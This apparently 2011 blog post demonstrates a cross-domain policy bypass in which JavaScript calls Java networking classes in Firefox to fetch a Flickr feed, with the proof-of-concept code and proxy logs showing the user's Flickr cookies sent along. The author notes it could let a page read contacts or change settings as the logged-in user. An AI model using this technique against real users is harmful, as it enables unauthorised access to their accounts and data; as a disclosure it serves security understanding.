I was just messing around with calling java classes in JavaScript (ff4) when it registered, that one can use a lenient crossdomain.xml policy for java.net to make request and response to a completely different server in applet container, therefore working around the cross domain policy.So I started with Flickr (since there are many flicker applet apps from which feed connection code can be borrowed), below is the cross domain policy on api.flickr.com.
http://api.flickr.com/crossdomain.xml
Then I borrowed the applet code (a hello world example on how to use java.net), and modified the same to execute in JavaScript tags and fetch the Flickr atom feed. The result is the request response from blogger to flickr (you can also call alert() if you prefer, as with below example) textbox with the response to the Flickr feeds request.
Currently works only on firefox. Compare with original feed
BTW, the cookies set for flickr.com does go with this api call. This means, if cross domain policy allows, one can call applications actions on flickr.com and use the response (read, export contacts of the logged-in user or change settings).
var urlStr = new java.net.URL("http://api.flickr.com/services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom");
var urlCn = urlStr.openConnection();
var a = new java.io.BufferedReader(new java.io.InputStreamReader(urlCn.getInputStream()));
var b = urlCn.getHeaderField(0);
b = b+"\n"+urlCn.getHeaderFieldKey(1)+": "+urlCn.getHeaderField(1);
b = b+"\n"+urlCn.getHeaderFieldKey(2)+": "+urlCn.getHeaderField(2);
b = b+"\n"+urlCn.getHeaderFieldKey(3)+": "+urlCn.getHeaderField(3);
b = b+"\n"+urlCn.getHeaderFieldKey(4)+": "+urlCn.getHeaderField(4);
b = b+"\n"+urlCn.getHeaderFieldKey(5)+": "+urlCn.getHeaderField(5);
b = b+"\n"+urlCn.getHeaderFieldKey(6)+": "+urlCn.getHeaderField(6);
b = b+"\n"+urlCn.getHeaderFieldKey(7)+": "+urlCn.getHeaderField(7);
b = b+"\n\n"
var inputLine = "";
while ((inputLine = a.readLine()) != null)
b = b+"\n"+inputLine;
//c=document.getElementById("page_content")
//c.innerHTML = b;
var f = new java.awt.Frame("TEST");
var ta = new java.awt.TextArea(b, 45, 600);
f.add("Center", ta);
f.pack( );
f.show( );
| # | Result | Protocol | Host | URL | Body | Caching | Content-Type | Process | Comments | Custom |
|---|---|---|---|---|---|---|---|---|---|---|
| 113 | 200 | HTTP | api.flickr.com | /crossdomain.xml | 265 | private | text/xml | java:6600 |
GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20
Host: api.flickr.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Cookie: BX=2ue9vrd6rhvda&b=3&s=s7; localization=en-us%3Bau%3Bau; search_z=t
HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 05:42:03 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Vary: Accept-Encoding
X-Served-By: www151.flickr.mud.yahoo.com
Cache-Control: private
Content-Type: text/xml
Content-length: 265
Connection: Keep-Alive
<!--?xml version="1.0"?--> <cross-domain-policy> <allow-access-from domain="*"> <site-control policies="master-only"> </site-control></allow-access-from></cross-domain-policy>
| # | Result | Protocol | Host | URL | Body | Caching | Content-Type | Process | Comments | Custom |
|---|---|---|---|---|---|---|---|---|---|---|
| 114 | 301 | HTTP | www.macromedia.com | /xml/dtds/cross-domain-policy.dtd | 261 | max-age=900 Expires: Thu, 28 Apr 2011 05:53:41 GMT | text/html; charset=iso-8859-1 | java:6600 |
GET /xml/dtds/cross-domain-policy.dtd HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20
Host: www.macromedia.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Cookie: BCSI-CS9B232E0E=2
HTTP/1.1 301 Moved Permanently
Date: Thu, 28 Apr 2011 05:38:41 GMT
Server: Apache
Location: http://www.adobe.com/xml/dtds/cross-domain-policy.dtd
Cache-Control: max-age=900
Expires: Thu, 28 Apr 2011 05:53:41 GMT
Content-Type: text/html; charset=iso-8859-1
Content-length: 261
Connection: Keep-Alive
Age: 201
<title>301 Moved Permanently</title> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">here</a>.</p>
| # | Result | Protocol | Host | URL | Body | Caching | Content-Type | Process | Comments | Custom |
|---|---|---|---|---|---|---|---|---|---|---|
| 116 | 200 | HTTP | api.flickr.com | /services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom | 27,652 | no-store, no-cache, must-revalidate, private Expires: Mon, 26 Jul 1997 05:00:00 GMT | application/atom+xml; charset=utf-8 | java:6600 |
GET /services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom HTTP/1.1
accept-encoding: gzip
Host: api.flickr.com
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
If-Modified-Since: Mon, 25 Apr 2011 04:16:01 GMT
Cookie: BX=2ue9vrd6rhvda&b=3&s=s7; localization=en-us%3Bau%3Bau; search_z=t
HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 05:42:04 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 04:16:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www78.flickr.mud.yahoo.com
Content-Type: application/atom+xml; charset=utf-8
Connection: Keep-Alive
Content-Length: 27652
<!--?xml version="1.0" encoding="utf-8" standalone="yes"?--> <feed xmlns="http://www.w3.org/2005/Atom" dc="http://purl.org/dc/elements/1.1/" flickr="urn:flickr:" media="http://search.yahoo.com/mrss/"> <title>Uploads from Joshua Marinacci</title> <link rel="self" href="http://api.flickr.com/services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom"> <link rel="alternate" type="text/html" href="http://www.flickr.com/photos/joshyx/"> <id>tag:flickr.com,2005:/photos/public/1850619</id> <icon>http://farm1.static.flickr.com/60/buddyicons/31706743@N00.jpg?1184425730#31706743@N00</icon> <subtitle></subtitle> <updated>2011-04-25T04:16:01Z</updated> </feed>
No comments:
Post a Comment